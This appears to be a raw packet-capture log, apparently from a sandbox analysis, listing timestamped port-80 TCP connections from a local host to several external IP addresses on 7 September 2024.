                                                                                                                                                                    Sep 7, 2024 15:34:31.295099020 CEST8049768172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:31.783400059 CEST8049768172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:31.783426046 CEST8049768172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:31.783489943 CEST4976880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:31.783651114 CEST4976880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:32.185602903 CEST4976980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:32.190387011 CEST804976964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.190462112 CEST4976980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:32.190577984 CEST4976980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:32.191085100 CEST4977080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:32.195501089 CEST804976964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.195554018 CEST4976980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:32.195830107 CEST8049770172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.195885897 CEST4977080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:32.195951939 CEST4977080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:32.200685978 CEST8049770172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.698201895 CEST8049770172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.698385954 CEST4977080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:32.698406935 CEST8049770172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.698453903 CEST4977080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:32.826088905 CEST4977180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:32.830981016 CEST804977164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.831060886 CEST4977180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:32.837210894 CEST4977180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:32.837718010 CEST4977280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:32.842029095 CEST804977164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.842087030 CEST4977180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:32.842514038 CEST8049772172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.842580080 CEST4977280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:32.842693090 CEST4977280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:32.847449064 CEST8049772172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:33.326996088 CEST8049772172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:33.327146053 CEST8049772172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:33.327210903 CEST4977280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:33.327344894 CEST4977280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:33.959283113 CEST4977380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:33.964142084 CEST804977345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:33.964215040 CEST4977380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:33.964308977 CEST4977380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:33.964782000 CEST4977480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:33.969399929 CEST804977345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:33.969456911 CEST4977380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:33.969567060 CEST8049774172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:33.969629049 CEST4977480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:33.977814913 CEST4977480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:33.982681990 CEST8049774172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:34.474129915 CEST8049774172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:34.474170923 CEST8049774172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:34.474227905 CEST4977480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:34.474273920 CEST4977480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:34.597100973 CEST4977580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:34.601986885 CEST804977588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:34.602135897 CEST4977580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:34.602294922 CEST4977580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:34.602884054 CEST4977680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:34.607287884 CEST804977588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:34.607374907 CEST4977580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:34.608194113 CEST8049776172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:34.608273983 CEST4977680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:34.618578911 CEST4977680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:34.623402119 CEST8049776172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:35.290193081 CEST8049776172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:35.290216923 CEST8049776172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:35.290226936 CEST8049776172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:35.290302038 CEST4977680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:35.290330887 CEST4977680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:35.290448904 CEST4977680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:38.225964069 CEST4977880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:38.230838060 CEST804977864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:38.231045008 CEST4977880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:38.243268013 CEST4977880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:38.243858099 CEST4977980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:38.248138905 CEST804977864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:38.248223066 CEST4977880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:38.248656988 CEST8049779172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:38.248728037 CEST4977980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:38.259144068 CEST4977980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:38.264066935 CEST8049779172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:38.751311064 CEST8049779172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:38.751343012 CEST8049779172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:38.751446962 CEST4977980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:38.751553059 CEST4977980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:42.368642092 CEST4978080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:42.373471022 CEST804978088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:42.373545885 CEST4978080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:42.375510931 CEST4978080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:42.376096010 CEST4978180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:42.380331993 CEST804978088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:42.380403996 CEST4978080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:42.380868912 CEST8049781172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:42.380964041 CEST4978180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:42.381042957 CEST4978180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:42.385809898 CEST8049781172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:42.863408089 CEST8049781172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:42.863514900 CEST8049781172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:42.863557100 CEST4978180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:42.863557100 CEST4978180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:42.995652914 CEST4978280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:43.000535965 CEST804978288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.000647068 CEST4978280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:43.008925915 CEST4978280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:43.009562969 CEST4978380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:43.013875008 CEST804978288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.013969898 CEST4978280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:43.014342070 CEST8049783172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.014422894 CEST4978380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:43.014545918 CEST4978380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:43.019289017 CEST8049783172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.498111963 CEST8049783172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.498259068 CEST8049783172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.498351097 CEST4978380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:43.498421907 CEST4978380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:43.834167004 CEST4978480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:43.838970900 CEST804978488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.839085102 CEST4978480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:43.852654934 CEST4978480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:43.853104115 CEST4978580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:43.858819962 CEST8049785172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.858831882 CEST804978488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.858916998 CEST4978580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:43.858920097 CEST4978480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:43.859005928 CEST4978580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:43.863862038 CEST8049785172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:44.369621992 CEST8049785172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:44.369755983 CEST8049785172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:44.369801998 CEST4978580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:44.369832993 CEST4978580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:45.238853931 CEST4978680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:45.244599104 CEST804978645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.244692087 CEST4978680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:45.244766951 CEST4978680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:45.245263100 CEST4978780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:45.251358986 CEST804978645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.251370907 CEST8049787172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.251480103 CEST4978680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:45.251481056 CEST4978780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:45.251573086 CEST4978780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:45.257599115 CEST8049787172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.732397079 CEST8049787172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.732419014 CEST8049787172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.732521057 CEST4978780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:45.732659101 CEST4978780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:47.558758020 CEST4978980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:47.563611984 CEST804978988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:47.563726902 CEST4978980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:47.563823938 CEST4978980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:47.564301014 CEST4979080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:47.568826914 CEST804978988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:47.568892002 CEST4978980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:47.569051027 CEST8049790172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:47.569117069 CEST4979080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:47.569206953 CEST4979080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:47.573957920 CEST8049790172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.051105976 CEST8049790172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.051120996 CEST8049790172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.051229000 CEST4979080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.051314116 CEST4979080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.181014061 CEST4979180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.185986996 CEST804979145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.188196898 CEST4979180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.194442034 CEST4979180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.195108891 CEST4979280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.199342012 CEST804979145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.199858904 CEST8049792172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.199912071 CEST4979180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.199949026 CEST4979280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.200033903 CEST4979280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.204799891 CEST8049792172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.689898968 CEST8049792172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.689964056 CEST8049792172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.690121889 CEST4979280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:48.690203905 CEST4979280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:49.411256075 CEST4979380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:49.416075945 CEST804979388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:49.416147947 CEST4979380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:49.430826902 CEST4979380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:49.431417942 CEST4979480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:49.435681105 CEST804979388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:49.435741901 CEST4979380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:49.436196089 CEST8049794172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:49.436259985 CEST4979480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:49.436351061 CEST4979480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:49.441124916 CEST8049794172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:49.937997103 CEST8049794172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:49.938056946 CEST8049794172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:49.938117027 CEST4979480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:49.941133976 CEST4979480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:50.474315882 CEST4979580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:50.479661942 CEST804979588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:50.479737043 CEST4979580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:50.493360996 CEST4979580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:50.493891001 CEST4979680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:50.498234034 CEST804979588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:50.498291969 CEST4979580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:50.498692036 CEST8049796172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:50.498754025 CEST4979680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:50.498827934 CEST4979680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:50.505228043 CEST8049796172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:50.983304977 CEST8049796172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:50.983318090 CEST8049796172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:50.983428955 CEST4979680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:50.983504057 CEST4979680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:51.098025084 CEST4979780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:51.102894068 CEST804979745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:51.102988005 CEST4979780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:51.118326902 CEST4979780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:51.119041920 CEST4979880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:51.123342037 CEST804979745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:51.123409033 CEST4979780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:51.123821974 CEST8049798172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:51.123893976 CEST4979880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:51.133968115 CEST4979880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:51.138844967 CEST8049798172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:51.606004953 CEST8049798172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:51.606038094 CEST8049798172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:51.606125116 CEST4979880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:51.606183052 CEST4979880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:52.414257050 CEST4979980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:52.419115067 CEST804979988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:52.419207096 CEST4979980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:52.419289112 CEST4979980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:52.419699907 CEST4980080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:52.424374104 CEST804979988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:52.424459934 CEST4979980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:52.424463987 CEST8049800172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:52.424520969 CEST4980080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:52.430787086 CEST4980080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:52.435599089 CEST8049800172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:52.916348934 CEST8049800172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:52.916426897 CEST8049800172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:52.916474104 CEST4980080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:52.916512966 CEST4980080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:53.041033983 CEST4980180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:53.047357082 CEST804980188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:53.047454119 CEST4980180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:53.047540903 CEST4980180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:53.048042059 CEST4980280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:53.053484917 CEST804980188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:53.053541899 CEST4980180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:53.053641081 CEST8049802172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:53.053699970 CEST4980280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:53.055766106 CEST4980280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:53.060585022 CEST8049802172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:53.537456036 CEST8049802172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:53.537498951 CEST8049802172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:53.537540913 CEST4980280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:53.537648916 CEST4980280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:55.925829887 CEST4980380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:56.144748926 CEST804980388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:56.144857883 CEST4980380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:56.144959927 CEST4980380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:56.145570040 CEST4980480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:56.150087118 CEST804980388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:56.150161028 CEST4980380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:56.150347948 CEST8049804172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:56.150419950 CEST4980480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:56.165196896 CEST4980480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:56.169955969 CEST8049804172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:56.629555941 CEST8049804172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:56.629575968 CEST8049804172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:56.629659891 CEST4980480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:56.629781961 CEST4980480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:57.644047022 CEST4980580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:57.648941040 CEST804980588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:57.649029016 CEST4980580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:57.649122000 CEST4980580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:57.649615049 CEST4980680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:57.654239893 CEST804980588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:57.654297113 CEST4980580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:57.654345989 CEST8049806172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:57.654406071 CEST4980680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:57.654464960 CEST4980680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:57.659221888 CEST8049806172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:58.176081896 CEST8049806172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:58.176167965 CEST8049806172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:58.176229954 CEST4980680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:58.176290989 CEST4980680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:58.538338900 CEST4980780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:58.543246031 CEST804980745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:58.543335915 CEST4980780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:58.543437958 CEST4980780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:58.543945074 CEST4980880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:58.548670053 CEST804980745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:58.548736095 CEST4980780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:58.548804998 CEST8049808172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:58.548870087 CEST4980880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:58.548954964 CEST4980880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:58.553689003 CEST8049808172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:59.053275108 CEST8049808172.234.222.138192.168.2.12
